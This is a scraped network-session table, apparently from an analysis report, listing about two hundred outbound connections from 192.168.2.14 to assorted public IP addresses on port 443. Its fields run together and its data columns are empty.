                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11820192.168.2.1443294148.153.169.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11821192.168.2.1441988191.226.228.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11822192.168.2.1435888103.251.95.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11823192.168.2.1439440186.41.120.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11824192.168.2.144328874.6.13.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11825192.168.2.1432968205.106.200.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11826192.168.2.1446332138.171.68.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11827192.168.2.144275496.73.108.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11828192.168.2.1458862100.163.137.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11829192.168.2.1460144106.157.21.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11830192.168.2.145214864.28.196.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11831192.168.2.1448488139.226.60.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11832192.168.2.1439774122.79.65.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11833192.168.2.1444088121.72.112.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11834192.168.2.145289852.87.135.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11835192.168.2.1458604166.124.176.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11836192.168.2.144706632.19.147.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11837192.168.2.14467308.83.90.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11838192.168.2.1440884152.102.88.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11839192.168.2.145900041.157.237.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11840192.168.2.144222441.233.230.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11841192.168.2.1440582152.198.196.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11842192.168.2.1434254139.96.111.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11843192.168.2.144774463.81.127.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11844192.168.2.1443290200.102.72.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11845192.168.2.143497695.143.112.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11846192.168.2.1449270146.151.1.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11847192.168.2.144373219.189.177.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11848192.168.2.1460876211.191.223.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11849192.168.2.145031219.142.131.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11850192.168.2.1456532196.111.82.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11851192.168.2.145847482.251.146.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11852192.168.2.144408013.79.193.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11853192.168.2.143560257.1.206.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11854192.168.2.1452272186.43.80.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11855192.168.2.1458036202.169.189.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11856192.168.2.145652424.1.85.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11857192.168.2.1434692176.217.113.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11858192.168.2.145182657.177.127.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11859192.168.2.144807832.209.55.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11860192.168.2.1457580117.45.120.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11861192.168.2.144492439.131.0.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11862192.168.2.145605823.70.146.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11863192.168.2.1456372181.140.188.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11864192.168.2.146011412.84.64.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11865192.168.2.14513742.76.18.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11866192.168.2.1447746222.52.208.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11867192.168.2.1445400146.100.9.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11868192.168.2.1443618202.162.73.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11869192.168.2.145904078.9.55.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11870192.168.2.145302035.22.70.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11871192.168.2.1437522190.8.159.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11872192.168.2.143470496.222.152.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11873192.168.2.144616883.14.118.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11874192.168.2.1449716203.188.140.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11875192.168.2.1443256104.48.190.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11876192.168.2.145581488.181.26.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11877192.168.2.144507890.59.37.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11878192.168.2.1439348160.193.55.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11879192.168.2.145285662.174.0.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11880192.168.2.1438052176.123.83.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11881192.168.2.1446196155.167.228.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11882192.168.2.143419044.40.203.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11883192.168.2.1444346216.135.123.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11884192.168.2.1440744212.207.36.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11885192.168.2.144289671.49.8.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11886192.168.2.1440814206.156.234.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11887192.168.2.145632494.224.108.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11888192.168.2.1451916223.4.202.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11889192.168.2.1435070100.210.63.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11890192.168.2.1450116101.217.222.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11891192.168.2.1451028153.119.21.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11892192.168.2.1445616164.164.36.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11893192.168.2.1439932102.113.23.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11894192.168.2.1440770137.8.69.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11895192.168.2.1433230190.45.27.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11896192.168.2.1449490103.171.38.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11897192.168.2.1456044102.223.69.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11898192.168.2.14537948.225.195.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11899192.168.2.144397496.201.24.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11900192.168.2.1451154175.200.122.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11901192.168.2.1447136128.148.202.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11902192.168.2.143362863.166.51.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11903192.168.2.144254871.105.235.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11904192.168.2.1453292176.193.227.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11905192.168.2.1448878212.233.211.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11906192.168.2.1460456120.53.155.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11907192.168.2.1450014157.66.143.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11908192.168.2.1443028147.88.106.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11909192.168.2.144177412.37.86.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11910192.168.2.1434128200.156.89.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11911192.168.2.1443020204.143.222.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11912192.168.2.145920041.81.126.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11913192.168.2.14399389.107.115.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11914192.168.2.144118244.106.202.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11915192.168.2.1445672111.151.38.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11916192.168.2.1436508105.87.86.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11917192.168.2.1441268133.123.20.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11918192.168.2.144551696.95.130.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11919192.168.2.1436368194.250.39.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11920192.168.2.1445676173.45.124.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11921192.168.2.1450244154.15.21.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11922192.168.2.1437468175.165.151.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11923192.168.2.1435650184.50.27.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11924192.168.2.145205249.242.194.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11925192.168.2.144637075.169.200.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11926192.168.2.1444446137.224.153.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11927192.168.2.1454888121.209.105.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11928192.168.2.144596213.109.186.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11929192.168.2.145842268.181.18.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11930192.168.2.1440532185.4.21.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11931192.168.2.1449158111.196.28.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11932192.168.2.1437496146.152.213.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11933192.168.2.1433558159.77.140.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11934192.168.2.1442958129.80.32.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11935192.168.2.144592834.179.32.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11936192.168.2.1459188129.141.114.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11937192.168.2.1459028187.251.86.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11938192.168.2.143630236.146.66.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11939192.168.2.1455226115.51.161.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11940192.168.2.1457846204.45.237.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11941192.168.2.145780084.114.254.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11942192.168.2.1445270223.201.81.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11943192.168.2.145561268.80.159.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11944192.168.2.1448898126.116.78.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11945192.168.2.1455724206.86.61.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11946192.168.2.144939682.44.240.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11947192.168.2.145927641.181.15.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11948192.168.2.144301462.101.116.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11949192.168.2.145022673.146.167.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11950192.168.2.1440696175.1.44.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11951192.168.2.1457254157.187.182.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11952192.168.2.1433638131.221.97.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11953192.168.2.1452550219.34.108.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11954192.168.2.1434368178.165.224.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11955192.168.2.144959425.101.149.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11956192.168.2.145859695.115.66.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11957192.168.2.1450644195.5.191.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11958192.168.2.1443830134.192.92.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11959192.168.2.1457968120.211.173.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11960192.168.2.144891465.223.79.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11961192.168.2.1459212184.119.107.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11962192.168.2.1433920118.109.238.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11963192.168.2.1439754139.215.128.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11964192.168.2.145287460.230.45.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11965192.168.2.1448952183.44.68.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11966192.168.2.143486884.230.109.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11967192.168.2.1432978165.47.27.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11968192.168.2.145372459.160.122.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11969192.168.2.143669038.89.213.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11970192.168.2.1434552103.38.68.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11971192.168.2.145076676.8.120.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11972192.168.2.143304679.237.68.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11973192.168.2.1449250187.222.149.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11974192.168.2.1459254220.228.69.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11975192.168.2.1459370156.74.189.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11976192.168.2.1455244219.249.102.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11977192.168.2.145648245.115.95.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11978192.168.2.1435978169.240.182.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11979192.168.2.1437034171.36.71.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11980192.168.2.145463073.124.30.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11981192.168.2.1435856175.208.24.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11982192.168.2.144685424.118.176.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11983192.168.2.144345865.167.43.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11984192.168.2.1441298194.128.248.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11985192.168.2.1448382109.8.81.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11986192.168.2.144198837.143.52.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11987192.168.2.1459902206.35.22.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11988192.168.2.1459316134.150.130.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11989192.168.2.144164823.92.211.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11990192.168.2.1436926189.48.74.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11991192.168.2.1452818210.35.70.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11992192.168.2.1433500176.198.71.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11993192.168.2.145928263.207.242.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11994192.168.2.14520101.232.137.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11995192.168.2.1441576104.100.80.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11996192.168.2.145321212.155.222.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11997192.168.2.1456964208.30.219.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11998192.168.2.1433694162.182.82.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11999192.168.2.1460280161.113.60.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12000192.168.2.1438608180.43.200.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12001192.168.2.143583878.113.155.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12002192.168.2.145130663.237.213.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12003192.168.2.144220290.241.148.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12004192.168.2.144024840.34.24.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12005192.168.2.1434454187.224.140.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12006192.168.2.14348984.124.201.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12007192.168.2.1437156176.190.38.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12008192.168.2.143778064.249.108.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12009192.168.2.1435572134.54.250.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12010192.168.2.1437736216.238.131.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12011192.168.2.145502244.100.30.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12012192.168.2.1458170171.206.132.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12013192.168.2.1452822194.93.37.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12014192.168.2.14551808.197.240.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12015192.168.2.1453696136.193.67.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12016192.168.2.1439002172.220.121.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12017192.168.2.1460026203.73.14.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12018192.168.2.1444650167.211.21.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12019192.168.2.1442160161.58.140.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12020192.168.2.145150834.120.44.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12021192.168.2.1432984194.31.176.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12022192.168.2.1455430192.47.205.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12023192.168.2.1434936144.43.134.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12024192.168.2.1442564119.83.75.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12025192.168.2.144289692.188.172.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12026192.168.2.1440868167.139.184.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12027192.168.2.1454162198.118.90.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12028192.168.2.1453276149.195.117.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12029192.168.2.1432950135.20.156.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12030192.168.2.144287499.173.121.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12031192.168.2.145350662.169.170.65443
                                                        TimestampBytes transferredDirectionData


